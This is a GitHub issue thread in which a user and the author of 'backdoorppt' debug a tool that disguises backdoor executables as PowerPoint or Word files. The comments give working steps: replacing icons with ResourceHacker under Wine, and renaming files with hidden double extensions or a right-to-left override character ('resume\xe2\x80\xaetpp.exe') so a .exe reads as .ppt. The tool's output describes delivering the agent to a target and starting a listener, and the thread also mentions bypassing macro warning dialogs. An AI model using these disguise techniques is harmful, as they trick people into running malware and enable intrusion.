Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

error while compiling.. #6

Closed
Falesco opened this issue Mar 5, 2017 · 24 comments
Closed

error while compiling.. #6

Falesco opened this issue Mar 5, 2017 · 24 comments

Comments

@Falesco
Copy link

Falesco commented Mar 5, 2017

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT) from -e:1:in

'
[⊶] Task over, Writing reports!

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

bug report: rename': No such file or directory


Do a check for me..

check if exist:

backdoorppt/output/backdoor.exe
or
backdoorppt/output/backdoor_ppt.exe

If the files are not present than possible causes are:

1 - you did not enter the payload.exe binary to be transformed.
    in "PAYLOAD TO BE TRANSFORMED" zenity-box  (full path location)
    and backdoorppt tool can not find the payload.exe to be transformed..
2 - 'PAYLOAD TO BE TRANSFORMED' its not a windows binary payload.exe



If the files are present than possible causes are:

1 - The 'Ruby interpreter' version its not compatible with the ruby command
      used by this tool "backdoorppt tool uses ruby 1.8.7 command syntax"

In that case: try using the 'BASH TRANSFORMATION' method insted

1º - edit 'settings' file and change the follow line:

BASH_TRANSFORMATION=NO
change it to:
BASH_TRANSFORMATION=YES

2º - save 'settings' file and run backdoorppt again

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

Thanks for the reply, let me check:) brb

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

backdoorppt/output/ is empty..

When i run the script, it let me choose a .exe File via a Dialog.
After that, i need to choose win7 settings for Wine.

Than it gives me this:

`[⊶] Checking backend applications!
[☆] Ruby installation -> found!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT) from -e:1:in

'
[⊶] Task over, Writing reports!

Icon select : Microsoft-Word-2016.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/resumeexe.ppt
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

edit 'settings' file and activate the BASH_TRANSFORMATION method..
BASH_TRANSFORMATION=YES

if dosent work in means that your resourcehacker
installed is not doing is job to replace payload icons ...

in that case edit 'settings' file and activate:
RESOURCEHACKER_BYPASS=YES

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

It looks like everything goes perfect, but still nothing in OUTPUT:

`root@kalix:~/Desktop/Tools/backdoorppt# ./backdoorppt.sh

+-+-+-+-+-+-+-+-+-+-+-+-+---+
|b|a|c|k|d|o|o|r|p|p|t|:|1.5|
+-+-+-+-+-+-+-+-+-+-+-+-+---+
'Office spoof extensions tool'
Credits: Damon Mohammadbagher

[⊶] Checking backend applications!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
[⊶] Task over, Writing reports!

Icon select : Powerpoint-green.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/testje.ppt.exe
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.

`

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

After a reboot, it seems to be working now!

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

its working the 2 transformations methods now?
what are the 'settings' active in backdoorppt/settings file?

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

Bypassing ResourceHacker..

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

i got the .ppt.exe now in OUTPUT

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

So that did the trick right?

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

not quite...
it means that your resourcehacker its not changing the payload icons...

Try to manually change the icons

replace $UpL by the full path of your payload to be transformed

wine /root/.wine/drive_c/"Program Files/"Resource Hacker"/ResourceHacker.exe -open $UpL -save /root/Desktop/Tools/backdoorppt/output/backdoor.exe -action addskip -res /root/Desktop/Tools/backdoorppt/icons/Microsoft-Excel.ico -mask ICONGROUP,MAINICON,

NOTE: settings file must be edited before runing bacdoorppt.sh rigth?

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

yea ofcourse.. But still nothing:)

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

well i have try just now the 4 diferent ways to build..
and everything works fine in my distro (kali rolling)...

it builds the 2 transformation methods (ruby or bash) using RH
and it builds the 2 transformation methods (ruby or bash) without using RH

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

yea no idea.. im running kali 2. also, i will try to reinstall the GIT, maybe that will do something..

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

any idea why i also dont get to choose the extension choise anymore? (doc, excl, etc)

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

btw.. is this the only "office spoof" tool u got? respect for this one afcorse!
But i was reading about a sillent doc exploit? Even not macro, u got any info about it?

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

ahhh you have some issue in your file system...
because backdoorppt.sh only uses backdoorexe.ppt or backdoor.ppt.exe extension methods

backdoorppt.sh uses the follow command to embedded extensions (ruby method)
1 - mv ~/backdoorppt/output/backdoor.exe ~/backdoorppt/output/backdoor_ppt.exe > /dev/null 2>&1
2 - ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

Those two commands will not interfer in linux file system in any way...



about sillent doc exploit i have writen a post-exploitation msf module
to change macro sandbox warning dialog read it here: post-exploitation msf module

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

okido let me check:) Thanks man

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

root@kalix:~/Desktop/Tools/backdoorppt/output# ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")' -e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
from -e:1:in <main>'

@r00t-3xp10it
Copy link
Owner

r00t-3xp10it commented Mar 5, 2017

the 2 above commands required an backdoor.exe
to be present in backdoorppt/output folder to be able to 'transform' the extensions..

in RUBY it requires:

backdoorppt/output/backdoor_ppt.exe
and then
ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

in BASH it requires:

/root/backdoorppt/output/backdoor.exe
and then
mv backdoorppt/output/backdoor.exe  backdoorppt/output/NAME.ppt.exe > /dev/null 2>&1

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

ohh okay so choose the "backdoor" manual by placing it in the output folder

@r00t-3xp10it
Copy link
Owner

yap

@Falesco
Copy link
Author

Falesco commented Mar 5, 2017

okido:)

@r00t-3xp10it
Copy link
Owner

Issue resolved .. resource hacker its working under wine 64 bits now ..

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants